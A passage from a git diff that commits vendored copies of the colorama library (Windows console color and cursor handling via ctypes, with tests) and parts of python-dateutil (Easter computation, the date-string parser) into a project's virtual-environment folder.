self.assertEqual(term.get_attrs(), WinColor.YELLOW) + + term._back = WinColor.MAGENTA + self.assertEqual( + term.get_attrs(), + WinColor.YELLOW + WinColor.MAGENTA * 16) + + term._style = WinStyle.BRIGHT + self.assertEqual( + term.get_attrs(), + WinColor.YELLOW + WinColor.MAGENTA * 16 + WinStyle.BRIGHT) + + @patch('colorama.winterm.win32') + def testResetAll(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 1 + 2 * 16 + 8 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + + term.set_console = Mock() + term._fore = -1 + term._back = -1 + term._style = -1 + + term.reset_all() + + self.assertEqual(term._fore, 1) + self.assertEqual(term._back, 2) + self.assertEqual(term._style, 8) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testFore(self): + term = WinTerm() + term.set_console = Mock() + term._fore = 0 + + term.fore(5) + + self.assertEqual(term._fore, 5) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testBack(self): + term = WinTerm() + term.set_console = Mock() + term._back = 0 + + term.back(5) + + self.assertEqual(term._back, 5) + self.assertEqual(term.set_console.called, True) + + @skipUnless(sys.platform.startswith("win"), "requires Windows") + def testStyle(self): + term = WinTerm() + term.set_console = Mock() + term._style = 0 + + term.style(22) + + self.assertEqual(term._style, 22) + self.assertEqual(term.set_console.called, True) + + @patch('colorama.winterm.win32') + def testSetConsole(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 0 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + term.windll = Mock() + + term.set_console() + + self.assertEqual( + mockWin32.SetConsoleTextAttribute.call_args, + ((mockWin32.STDOUT, term.get_attrs()), {}) + ) + + @patch('colorama.winterm.win32') + def testSetConsoleOnStderr(self, mockWin32): + mockAttr = Mock() + mockAttr.wAttributes = 0 + mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr + term = WinTerm() + term.windll = Mock() + + term.set_console(on_stderr=True) + + self.assertEqual( + mockWin32.SetConsoleTextAttribute.call_args, + ((mockWin32.STDERR, term.get_attrs()), {}) + ) + + +if __name__ == '__main__': + main() diff --git a/env/Lib/site-packages/colorama/win32.py b/env/Lib/site-packages/colorama/win32.py new file mode 100644 index 00000000..841b0e27 --- /dev/null +++ b/env/Lib/site-packages/colorama/win32.py @@ -0,0 +1,180 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. + +# from winbase.h +STDOUT = -11 +STDERR = -12 + +ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004 + +try: + import ctypes + from ctypes import LibraryLoader + windll = LibraryLoader(ctypes.WinDLL) + from ctypes import wintypes +except (AttributeError, ImportError): + windll = None + SetConsoleTextAttribute = lambda *_: None + winapi_test = lambda *_: None +else: + from ctypes import byref, Structure, c_char, POINTER + + COORD = wintypes._COORD + + class CONSOLE_SCREEN_BUFFER_INFO(Structure): + """struct in wincon.h.""" + _fields_ = [ + ("dwSize", COORD), + ("dwCursorPosition", COORD), + ("wAttributes", wintypes.WORD), + ("srWindow", wintypes.SMALL_RECT), + ("dwMaximumWindowSize", COORD), + ] + def __str__(self): + return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % ( + self.dwSize.Y, self.dwSize.X + , self.dwCursorPosition.Y, self.dwCursorPosition.X + , self.wAttributes + , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right + , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X + ) + + _GetStdHandle = windll.kernel32.GetStdHandle + _GetStdHandle.argtypes = [ + wintypes.DWORD, + ] + _GetStdHandle.restype = wintypes.HANDLE + + _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo + _GetConsoleScreenBufferInfo.argtypes = [ + wintypes.HANDLE, + POINTER(CONSOLE_SCREEN_BUFFER_INFO), + ] + _GetConsoleScreenBufferInfo.restype = wintypes.BOOL + + _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute + _SetConsoleTextAttribute.argtypes = [ + wintypes.HANDLE, + wintypes.WORD, + ] + _SetConsoleTextAttribute.restype = wintypes.BOOL + + _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition + _SetConsoleCursorPosition.argtypes = [ + wintypes.HANDLE, + COORD, + ] + _SetConsoleCursorPosition.restype = wintypes.BOOL + + _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA + _FillConsoleOutputCharacterA.argtypes = [ + wintypes.HANDLE, + c_char, + wintypes.DWORD, + COORD, + POINTER(wintypes.DWORD), + ] + _FillConsoleOutputCharacterA.restype = wintypes.BOOL + + _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute + _FillConsoleOutputAttribute.argtypes = [ + wintypes.HANDLE, + wintypes.WORD, + wintypes.DWORD, + COORD, + POINTER(wintypes.DWORD), + ] + _FillConsoleOutputAttribute.restype = wintypes.BOOL + + _SetConsoleTitleW = windll.kernel32.SetConsoleTitleW + _SetConsoleTitleW.argtypes = [ + wintypes.LPCWSTR + ] + _SetConsoleTitleW.restype = wintypes.BOOL + + _GetConsoleMode = windll.kernel32.GetConsoleMode + _GetConsoleMode.argtypes = [ + wintypes.HANDLE, + POINTER(wintypes.DWORD) + ] + _GetConsoleMode.restype = wintypes.BOOL + + _SetConsoleMode = windll.kernel32.SetConsoleMode + _SetConsoleMode.argtypes = [ + wintypes.HANDLE, + wintypes.DWORD + ] + _SetConsoleMode.restype = wintypes.BOOL + + def _winapi_test(handle): + csbi = CONSOLE_SCREEN_BUFFER_INFO() + success = _GetConsoleScreenBufferInfo( + handle, byref(csbi)) + return bool(success) + + def winapi_test(): + return any(_winapi_test(h) for h in + (_GetStdHandle(STDOUT), _GetStdHandle(STDERR))) + + def GetConsoleScreenBufferInfo(stream_id=STDOUT): + handle = _GetStdHandle(stream_id) + csbi = CONSOLE_SCREEN_BUFFER_INFO() + success = _GetConsoleScreenBufferInfo( + handle, byref(csbi)) + return csbi + + def SetConsoleTextAttribute(stream_id, attrs): + handle = _GetStdHandle(stream_id) + return _SetConsoleTextAttribute(handle, attrs) + + def SetConsoleCursorPosition(stream_id, position, adjust=True): + position = COORD(*position) + # If the position is out of range, do nothing. + if position.Y <= 0 or position.X <= 0: + return + # Adjust for Windows' SetConsoleCursorPosition: + # 1. being 0-based, while ANSI is 1-based. + # 2. expecting (x,y), while ANSI uses (y,x). + adjusted_position = COORD(position.Y - 1, position.X - 1) + if adjust: + # Adjust for viewport's scroll position + sr = GetConsoleScreenBufferInfo(STDOUT).srWindow + adjusted_position.Y += sr.Top + adjusted_position.X += sr.Left + # Resume normal processing + handle = _GetStdHandle(stream_id) + return _SetConsoleCursorPosition(handle, adjusted_position) + + def FillConsoleOutputCharacter(stream_id, char, length, start): + handle = _GetStdHandle(stream_id) + char = c_char(char.encode()) + length = wintypes.DWORD(length) + num_written = wintypes.DWORD(0) + # Note that this is hard-coded for ANSI (vs wide) bytes. + success = _FillConsoleOutputCharacterA( + handle, char, length, start, byref(num_written)) + return num_written.value + + def FillConsoleOutputAttribute(stream_id, attr, length, start): + ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )''' + handle = _GetStdHandle(stream_id) + attribute = wintypes.WORD(attr) + length = wintypes.DWORD(length) + num_written = wintypes.DWORD(0) + # Note that this is hard-coded for ANSI (vs wide) bytes. + return _FillConsoleOutputAttribute( + handle, attribute, length, start, byref(num_written)) + + def SetConsoleTitle(title): + return _SetConsoleTitleW(title) + + def GetConsoleMode(handle): + mode = wintypes.DWORD() + success = _GetConsoleMode(handle, byref(mode)) + if not success: + raise ctypes.WinError() + return mode.value + + def SetConsoleMode(handle, mode): + success = _SetConsoleMode(handle, mode) + if not success: + raise ctypes.WinError() diff --git a/env/Lib/site-packages/colorama/winterm.py b/env/Lib/site-packages/colorama/winterm.py new file mode 100644 index 00000000..aad867e8 --- /dev/null +++ b/env/Lib/site-packages/colorama/winterm.py @@ -0,0 +1,195 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +try: + from msvcrt import get_osfhandle +except ImportError: + def get_osfhandle(_): + raise OSError("This isn't windows!") + + +from . import win32 + +# from wincon.h +class WinColor(object): + BLACK = 0 + BLUE = 1 + GREEN = 2 + CYAN = 3 + RED = 4 + MAGENTA = 5 + YELLOW = 6 + GREY = 7 + +# from wincon.h +class WinStyle(object): + NORMAL = 0x00 # dim text, dim background + BRIGHT = 0x08 # bright text, dim background + BRIGHT_BACKGROUND = 0x80 # dim text, bright background + +class WinTerm(object): + + def __init__(self): + self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes + self.set_attrs(self._default) + self._default_fore = self._fore + self._default_back = self._back + self._default_style = self._style + # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style. + # So that LIGHT_EX colors and BRIGHT style do not clobber each other, + # we track them separately, since LIGHT_EX is overwritten by Fore/Back + # and BRIGHT is overwritten by Style codes. + self._light = 0 + + def get_attrs(self): + return self._fore + self._back * 16 + (self._style | self._light) + + def set_attrs(self, value): + self._fore = value & 7 + self._back = (value >> 4) & 7 + self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND) + + def reset_all(self, on_stderr=None): + self.set_attrs(self._default) + self.set_console(attrs=self._default) + self._light = 0 + + def fore(self, fore=None, light=False, on_stderr=False): + if fore is None: + fore = self._default_fore + self._fore = fore + # Emulate LIGHT_EX with BRIGHT Style + if light: + self._light |= WinStyle.BRIGHT + else: + self._light &= ~WinStyle.BRIGHT + self.set_console(on_stderr=on_stderr) + + def back(self, back=None, light=False, on_stderr=False): + if back is None: + back = self._default_back + self._back = back + # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style + if light: + self._light |= WinStyle.BRIGHT_BACKGROUND + else: + self._light &= ~WinStyle.BRIGHT_BACKGROUND + self.set_console(on_stderr=on_stderr) + + def style(self, style=None, on_stderr=False): + if style is None: + style = self._default_style + self._style = style + self.set_console(on_stderr=on_stderr) + + def set_console(self, attrs=None, on_stderr=False): + if attrs is None: + attrs = self.get_attrs() + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + win32.SetConsoleTextAttribute(handle, attrs) + + def get_position(self, handle): + position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition + # Because Windows coordinates are 0-based, + # and win32.SetConsoleCursorPosition expects 1-based. + position.X += 1 + position.Y += 1 + return position + + def set_cursor_position(self, position=None, on_stderr=False): + if position is None: + # I'm not currently tracking the position, so there is no default. + # position = self.get_position() + return + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + win32.SetConsoleCursorPosition(handle, position) + + def cursor_adjust(self, x, y, on_stderr=False): + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + position = self.get_position(handle) + adjusted_position = (position.Y + y, position.X + x) + win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False) + + def erase_screen(self, mode=0, on_stderr=False): + # 0 should clear from the cursor to the end of the screen. + # 1 should clear from the cursor to the beginning of the screen. + # 2 should clear the entire screen, and move cursor to (1,1) + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + csbi = win32.GetConsoleScreenBufferInfo(handle) + # get the number of character cells in the current buffer + cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y + # get number of character cells before current cursor position + cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X + if mode == 0: + from_coord = csbi.dwCursorPosition + cells_to_erase = cells_in_screen - cells_before_cursor + elif mode == 1: + from_coord = win32.COORD(0, 0) + cells_to_erase = cells_before_cursor + elif mode == 2: + from_coord = win32.COORD(0, 0) + cells_to_erase = cells_in_screen + else: + # invalid mode + return + # fill the entire screen with blanks + win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) + # now set the buffer's attributes accordingly + win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) + if mode == 2: + # put the cursor where needed + win32.SetConsoleCursorPosition(handle, (1, 1)) + + def erase_line(self, mode=0, on_stderr=False): + # 0 should clear from the cursor to the end of the line. + # 1 should clear from the cursor to the beginning of the line. + # 2 should clear the entire line. + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + csbi = win32.GetConsoleScreenBufferInfo(handle) + if mode == 0: + from_coord = csbi.dwCursorPosition + cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X + elif mode == 1: + from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) + cells_to_erase = csbi.dwCursorPosition.X + elif mode == 2: + from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) + cells_to_erase = csbi.dwSize.X + else: + # invalid mode + return + # fill the entire screen with blanks + win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) + # now set the buffer's attributes accordingly + win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) + + def set_title(self, title): + win32.SetConsoleTitle(title) + + +def enable_vt_processing(fd): + if win32.windll is None or not win32.winapi_test(): + return False + + try: + handle = get_osfhandle(fd) + mode = win32.GetConsoleMode(handle) + win32.SetConsoleMode( + handle, + mode | win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING, + ) + + mode = win32.GetConsoleMode(handle) + if mode & win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING: + return True + # Can get TypeError in testsuite where 'fd' is a Mock() + except (OSError, TypeError): + return False diff --git a/env/Lib/site-packages/dateutil/__init__.py b/env/Lib/site-packages/dateutil/__init__.py new file mode 100644 index 00000000..0defb82e --- /dev/null +++ b/env/Lib/site-packages/dateutil/__init__.py @@ -0,0 +1,8 @@ +# -*- coding: utf-8 -*- +try: + from ._version import version as __version__ +except ImportError: + __version__ = 'unknown' + +__all__ = ['easter', 'parser', 'relativedelta', 'rrule', 'tz', + 'utils', 'zoneinfo'] diff --git a/env/Lib/site-packages/dateutil/_common.py b/env/Lib/site-packages/dateutil/_common.py new file mode 100644 index 00000000..4eb2659b --- /dev/null +++ b/env/Lib/site-packages/dateutil/_common.py @@ -0,0 +1,43 @@ +""" +Common code used in multiple modules. +""" + + +class weekday(object): + __slots__ = ["weekday", "n"] + + def __init__(self, weekday, n=None): + self.weekday = weekday + self.n = n + + def __call__(self, n): + if n == self.n: + return self + else: + return self.__class__(self.weekday, n) + + def __eq__(self, other): + try: + if self.weekday != other.weekday or self.n != other.n: + return False + except AttributeError: + return False + return True + + def __hash__(self): + return hash(( + self.weekday, + self.n, + )) + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + s = ("MO", "TU", "WE", "TH", "FR", "SA", "SU")[self.weekday] + if not self.n: + return s + else: + return "%s(%+d)" % (s, self.n) + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/_version.py b/env/Lib/site-packages/dateutil/_version.py new file mode 100644 index 00000000..b723056a --- /dev/null +++ b/env/Lib/site-packages/dateutil/_version.py @@ -0,0 +1,5 @@ +# coding: utf-8 +# file generated by setuptools_scm +# don't change, don't track in version control +version = '2.8.2' +version_tuple = (2, 8, 2) diff --git a/env/Lib/site-packages/dateutil/easter.py b/env/Lib/site-packages/dateutil/easter.py new file mode 100644 index 00000000..f74d1f74 --- /dev/null +++ b/env/Lib/site-packages/dateutil/easter.py @@ -0,0 +1,89 @@ +# -*- coding: utf-8 -*- +""" +This module offers a generic Easter computing method for any given year, using +Western, Orthodox or Julian algorithms. +""" + +import datetime + +__all__ = ["easter", "EASTER_JULIAN", "EASTER_ORTHODOX", "EASTER_WESTERN"] + +EASTER_JULIAN = 1 +EASTER_ORTHODOX = 2 +EASTER_WESTERN = 3 + + +def easter(year, method=EASTER_WESTERN): + """ + This method was ported from the work done by GM Arts, + on top of the algorithm by Claus Tondering, which was + based in part on the algorithm of Ouding (1940), as + quoted in "Explanatory Supplement to the Astronomical + Almanac", P. Kenneth Seidelmann, editor. + + This algorithm implements three different Easter + calculation methods: + + 1. Original calculation in Julian calendar, valid in + dates after 326 AD + 2. Original method, with date converted to Gregorian + calendar, valid in years 1583 to 4099 + 3. Revised method, in Gregorian calendar, valid in + years 1583 to 4099 as well + + These methods are represented by the constants: + + * ``EASTER_JULIAN = 1`` + * ``EASTER_ORTHODOX = 2`` + * ``EASTER_WESTERN = 3`` + + The default method is method 3. + + More about the algorithm may be found at: + + `GM Arts: Easter Algorithms `_ + + and + + `The Calendar FAQ: Easter `_ + + """ + + if not (1 <= method <= 3): + raise ValueError("invalid method") + + # g - Golden year - 1 + # c - Century + # h - (23 - Epact) mod 30 + # i - Number of days from March 21 to Paschal Full Moon + # j - Weekday for PFM (0=Sunday, etc) + # p - Number of days from March 21 to Sunday on or before PFM + # (-6 to 28 methods 1 & 3, to 56 for method 2) + # e - Extra days to add for method 2 (converting Julian + # date to Gregorian date) + + y = year + g = y % 19 + e = 0 + if method < 3: + # Old method + i = (19*g + 15) % 30 + j = (y + y//4 + i) % 7 + if method == 2: + # Extra dates to convert Julian to Gregorian date + e = 10 + if y > 1600: + e = e + y//100 - 16 - (y//100 - 16)//4 + else: + # New method + c = y//100 + h = (c - c//4 - (8*c + 13)//25 + 19*g + 15) % 30 + i = h - (h//28)*(1 - (h//28)*(29//(h + 1))*((21 - g)//11)) + j = (y + y//4 + i + 2 - c + c//4) % 7 + + # p can be from -6 to 56 corresponding to dates 22 March to 23 May + # (later dates apply to method 2, although 23 May never actually occurs) + p = i - j + e + d = 1 + (p + 27 + (p + 6)//40) % 31 + m = 3 + (p + 26)//30 + return datetime.date(int(y), int(m), int(d)) diff --git a/env/Lib/site-packages/dateutil/parser/__init__.py b/env/Lib/site-packages/dateutil/parser/__init__.py new file mode 100644 index 00000000..d174b0e4 --- /dev/null +++ b/env/Lib/site-packages/dateutil/parser/__init__.py @@ -0,0 +1,61 @@ +# -*- coding: utf-8 -*- +from ._parser import parse, parser, parserinfo, ParserError +from ._parser import DEFAULTPARSER, DEFAULTTZPARSER +from ._parser import UnknownTimezoneWarning + +from ._parser import __doc__ + +from .isoparser import isoparser, isoparse + +__all__ = ['parse', 'parser', 'parserinfo', + 'isoparse', 'isoparser', + 'ParserError', + 'UnknownTimezoneWarning'] + + +### +# Deprecate portions of the private interface so that downstream code that +# is improperly relying on it is given *some* notice. + + +def __deprecated_private_func(f): + from functools import wraps + import warnings + + msg = ('{name} is a private function and may break without warning, ' + 'it will be moved and or renamed in future versions.') + msg = msg.format(name=f.__name__) + + @wraps(f) + def deprecated_func(*args, **kwargs): + warnings.warn(msg, DeprecationWarning) + return f(*args, **kwargs) + + return deprecated_func + +def __deprecate_private_class(c): + import warnings + + msg = ('{name} is a private class and may break without warning, ' + 'it will be moved and or renamed in future versions.') + msg = msg.format(name=c.__name__) + + class private_class(c): + __doc__ = c.__doc__ + + def __init__(self, *args, **kwargs): + warnings.warn(msg, DeprecationWarning) + super(private_class, self).__init__(*args, **kwargs) + + private_class.__name__ = c.__name__ + + return private_class + + +from ._parser import _timelex, _resultbase +from ._parser import _tzparser, _parsetz + +_timelex = __deprecate_private_class(_timelex) +_tzparser = __deprecate_private_class(_tzparser) +_resultbase = __deprecate_private_class(_resultbase) +_parsetz = __deprecated_private_func(_parsetz) diff --git a/env/Lib/site-packages/dateutil/parser/_parser.py b/env/Lib/site-packages/dateutil/parser/_parser.py new file mode 100644 index 00000000..37d1663b --- /dev/null +++ b/env/Lib/site-packages/dateutil/parser/_parser.py @@ -0,0 +1,1613 @@ +# -*- coding: utf-8 -*- +""" +This module offers a generic date/time string parser which is able to parse +most known formats to represent a date and/or time. + +This module attempts to be forgiving with regards to unlikely input formats, +returning a datetime object even for dates which are ambiguous. If an element +of a date/time stamp is omitted, the following rules are applied: + +- If AM or PM is left unspecified, a 24-hour clock is assumed, however, an hour + on a 12-hour clock (``0 <= hour <= 12``) *must* be specified if AM or PM is + specified. +- If a time zone is omitted, a timezone-naive datetime is returned. + +If any other elements are missing, they are taken from the +:class:`datetime.datetime` object passed to the parameter ``default``. If this +results in a day number exceeding the valid number of days per month, the +value falls back to the end of the month. + +Additional resources about date/time string formats can be found below: + +- `A summary of the international standard date and time notation + `_ +- `W3C Date and Time Formats `_ +- `Time Formats (Planetary Rings Node) `_ +- `CPAN ParseDate module + `_ +- `Java SimpleDateFormat Class + `_ +""" +from __future__ import unicode_literals + +import datetime +import re +import string +import time +import warnings + +from calendar import monthrange +from io import StringIO + +import six +from six import integer_types, text_type + +from decimal import Decimal + +from warnings import warn + +from .. import relativedelta +from .. import tz + +__all__ = ["parse", "parserinfo", "ParserError"] + + +# TODO: pandas.core.tools.datetimes imports this explicitly. Might be worth +# making public and/or figuring out if there is something we can +# take off their plate. +class _timelex(object): + # Fractional seconds are sometimes split by a comma + _split_decimal = re.compile("([.,])") + + def __init__(self, instream): + if isinstance(instream, (bytes, bytearray)): + instream = instream.decode() + + if isinstance(instream, text_type): + instream = StringIO(instream) + elif getattr(instream, 'read', None) is None: + raise TypeError('Parser must be a string or character stream, not ' + '{itype}'.format(itype=instream.__class__.__name__)) + + self.instream = instream + self.charstack = [] + self.tokenstack = [] + self.eof = False + + def get_token(self): + """ + This function breaks the time string into lexical units (tokens), which + can be parsed by the parser. Lexical units are demarcated by changes in + the character set, so any continuous string of letters is considered + one unit, any continuous string of numbers is considered one unit. + + The main complication arises from the fact that dots ('.') can be used + both as separators (e.g. "Sep.20.2009") or decimal points (e.g. + "4:30:21.447"). As such, it is necessary to read the full context of + any dot-separated strings before breaking it into tokens; as such, this + function maintains a "token stack", for when the ambiguous context + demands that multiple tokens be parsed at once. + """ + if self.tokenstack: + return self.tokenstack.pop(0) + + seenletters = False + token = None + state = None + + while not self.eof: + # We only realize that we've reached the end of a token when we + # find a character that's not part of the current token - since + # that character may be part of the next token, it's stored in the + # charstack. + if self.charstack: + nextchar = self.charstack.pop(0) + else: + nextchar = self.instream.read(1) + while nextchar == '\x00': + nextchar = self.instream.read(1) + + if not nextchar: + self.eof = True + break + elif not state: + # First character of the token - determines if we're starting + # to parse a word, a number or something else. + token = nextchar + if self.isword(nextchar): + state = 'a' + elif self.isnum(nextchar): + state = '0' + elif self.isspace(nextchar): + token = ' ' + break # emit token + else: + break # emit token + elif state == 'a': + # If we've already started reading a word, we keep reading + # letters until we find something that's not part of a word. + seenletters = True + if self.isword(nextchar): + token += nextchar + elif nextchar == '.': + token += nextchar + state = 'a.' + else: + self.charstack.append(nextchar) + break # emit token + elif state == '0': + # If we've already started reading a number, we keep reading + # numbers until we find something that doesn't fit. + if self.isnum(nextchar): + token += nextchar + elif nextchar == '.' or (nextchar == ',' and len(token) >= 2): + token += nextchar + state = '0.' + else: + self.charstack.append(nextchar) + break # emit token + elif state == 'a.': + # If we've seen some letters and a dot separator, continue + # parsing, and the tokens will be broken up later. + seenletters = True + if nextchar == '.' or self.isword(nextchar): + token += nextchar + elif self.isnum(nextchar) and token[-1] == '.': + token += nextchar + state = '0.' + else: + self.charstack.append(nextchar) + break # emit token + elif state == '0.': + # If we've seen at least one dot separator, keep going, we'll + # break up the tokens later. + if nextchar == '.' or self.isnum(nextchar): + token += nextchar + elif self.isword(nextchar) and token[-1] == '.': + token += nextchar + state = 'a.' + else: + self.charstack.append(nextchar) + break # emit token + + if (state in ('a.', '0.') and (seenletters or token.count('.') > 1 or + token[-1] in '.,')): + l = self._split_decimal.split(token) + token = l[0] + for tok in l[1:]: + if tok: + self.tokenstack.append(tok) + + if state == '0.' and token.count('.') == 0: + token = token.replace(',', '.') + + return token + + def __iter__(self): + return self + + def __next__(self): + token = self.get_token() + if token is None: + raise StopIteration + + return token + + def next(self): + return self.__next__() # Python 2.x support + + @classmethod + def split(cls, s): + return list(cls(s)) + + @classmethod + def isword(cls, nextchar): + """ Whether or not the next character is part of a word """ + return nextchar.isalpha() + + @classmethod + def isnum(cls, nextchar): + """ Whether the next character is part of a number """ + return nextchar.isdigit() + + @classmethod + def isspace(cls, nextchar): + """ Whether the next character is whitespace """ + return nextchar.isspace() + + +class _resultbase(object): + + def __init__(self): + for attr in self.__slots__: + setattr(self, attr, None) + + def _repr(self, classname): + l = [] + for attr in self.__slots__: + value = getattr(self, attr) + if value is not None: + l.append("%s=%s" % (attr, repr(value))) + return "%s(%s)" % (classname, ", ".join(l)) + + def __len__(self): + return (sum(getattr(self, attr) is not None + for attr in self.__slots__)) + + def __repr__(self): + return self._repr(self.__class__.__name__) + + +class parserinfo(object): + """ + Class which handles what inputs are accepted. Subclass this to customize + the language and acceptable values for each parameter. + + :param dayfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the day (``True``) or month (``False``). If + ``yearfirst`` is set to ``True``, this distinguishes between YDM + and YMD. Default is ``False``. + + :param yearfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the year. If ``True``, the first number is taken + to be the year, otherwise the last number is taken to be the year. + Default is ``False``. + """ + + # m from a.m/p.m, t from ISO T separator + JUMP = [" ", ".", ",", ";", "-", "/", "'", + "at", "on", "and", "ad", "m", "t", "of", + "st", "nd", "rd", "th"] + + WEEKDAYS = [("Mon", "Monday"), + ("Tue", "Tuesday"), # TODO: "Tues" + ("Wed", "Wednesday"), + ("Thu", "Thursday"), # TODO: "Thurs" + ("Fri", "Friday"), + ("Sat", "Saturday"), + ("Sun", "Sunday")] + MONTHS = [("Jan", "January"), + ("Feb", "February"), # TODO: "Febr" + ("Mar", "March"), + ("Apr", "April"), + ("May", "May"), + ("Jun", "June"), + ("Jul", "July"), + ("Aug", "August"), + ("Sep", "Sept", "September"), + ("Oct", "October"), + ("Nov", "November"), + ("Dec", "December")] + HMS = [("h", "hour", "hours"), + ("m", "minute", "minutes"), + ("s", "second", "seconds")] + AMPM = [("am", "a"), + ("pm", "p")] + UTCZONE = ["UTC", "GMT", "Z", "z"] + PERTAIN = ["of"] + TZOFFSET = {} + # TODO: ERA = ["AD", "BC", "CE", "BCE", "Stardate", + # "Anno Domini", "Year of Our Lord"] + + def __init__(self, dayfirst=False, yearfirst=False): + self._jump = self._convert(self.JUMP) + self._weekdays = self._convert(self.WEEKDAYS) + self._months = self._convert(self.MONTHS) + self._hms = self._convert(self.HMS) + self._ampm = self._convert(self.AMPM) + self._utczone = self._convert(self.UTCZONE) + self._pertain = self._convert(self.PERTAIN) + + self.dayfirst = dayfirst + self.yearfirst = yearfirst + + self._year = time.localtime().tm_year + self._century = self._year // 100 * 100 + + def _convert(self, lst): + dct = {} + for i, v in enumerate(lst): + if isinstance(v, tuple): + for v in v: + dct[v.lower()] = i + else: + dct[v.lower()] = i + return dct + + def jump(self, name): + return name.lower() in self._jump + + def weekday(self, name): + try: + return self._weekdays[name.lower()] + except KeyError: + pass + return None + + def month(self, name): + try: + return self._months[name.lower()] + 1 + except KeyError: + pass + return None + + def hms(self, name): + try: + return self._hms[name.lower()] + except KeyError: + return None + + def ampm(self, name): + try: + return self._ampm[name.lower()] + except KeyError: + return None + + def pertain(self, name): + return name.lower() in self._pertain + + def utczone(self, name): + return name.lower() in self._utczone + + def tzoffset(self, name): + if name in self._utczone: + return 0 + + return self.TZOFFSET.get(name) + + def convertyear(self, year, century_specified=False): + """ + Converts two-digit years to year within [-50, 49] + range of self._year (current local time) + """ + + # Function contract is that the year is always positive + assert year >= 0 + + if year < 100 and not century_specified: + # assume current century to start + year += self._century + + if year >= self._year + 50: # if too far in future + year -= 100 + elif year < self._year - 50: # if too far in past + year += 100 + + return year + + def validate(self, res): + # move to info + if res.year is not None: + res.year = self.convertyear(res.year, res.century_specified) + + if ((res.tzoffset == 0 and not res.tzname) or + (res.tzname == 'Z' or res.tzname == 'z')): + res.tzname = "UTC" + res.tzoffset = 0 + elif res.tzoffset != 0 and res.tzname and self.utczone(res.tzname): + res.tzoffset = 0 + return True + + +class _ymd(list): + def __init__(self, *args, **kwargs): + super(self.__class__, self).__init__(*args, **kwargs) + self.century_specified = False + self.dstridx = None + self.mstridx = None + self.ystridx = None + + @property + def has_year(self): + return self.ystridx is not None + + @property + def has_month(self): + return self.mstridx is not None + + @property + def has_day(self): + return self.dstridx is not None + + def could_be_day(self, value): + if self.has_day: + return False + elif not self.has_month: + return 1 <= value <= 31 + elif not self.has_year: + # Be permissive, assume leap year + month = self[self.mstridx] + return 1 <= value <= monthrange(2000, month)[1] + else: + month = self[self.mstridx] + year = self[self.ystridx] + return 1 <= value <= monthrange(year, month)[1] + + def append(self, val, label=None): + if hasattr(val, '__len__'): + if val.isdigit() and len(val) > 2: + self.century_specified = True + if label not in [None, 'Y']: # pragma: no cover + raise ValueError(label) + label = 'Y' + elif val > 100: + self.century_specified = True + if label not in [None, 'Y']: # pragma: no cover + raise ValueError(label) + label = 'Y' + + super(self.__class__, self).append(int(val)) + + if label == 'M': + if self.has_month: + raise ValueError('Month is already set') + self.mstridx = len(self) - 1 + elif label == 'D': + if self.has_day: + raise ValueError('Day is already set') + self.dstridx = len(self) - 1 + elif label == 'Y': + if self.has_year: + raise ValueError('Year is already set') + self.ystridx = len(self) - 1 + + def _resolve_from_stridxs(self, strids): + """ + Try to resolve the identities of year/month/day elements using + ystridx, mstridx, and dstridx, if enough of these are specified. + """ + if len(self) == 3 and len(strids) == 2: + # we can back out the remaining stridx value + missing = [x for x in range(3) if x not in strids.values()] + key = [x for x in ['y', 'm', 'd'] if x not in strids] + assert len(missing) == len(key) == 1 + key = key[0] + val = missing[0] + strids[key] = val + + assert len(self) == len(strids) # otherwise this should not be called + out = {key: self[strids[key]] for key in strids} + return (out.get('y'), out.get('m'), out.get('d')) + + def resolve_ymd(self, yearfirst, dayfirst): + len_ymd = len(self) + year, month, day = 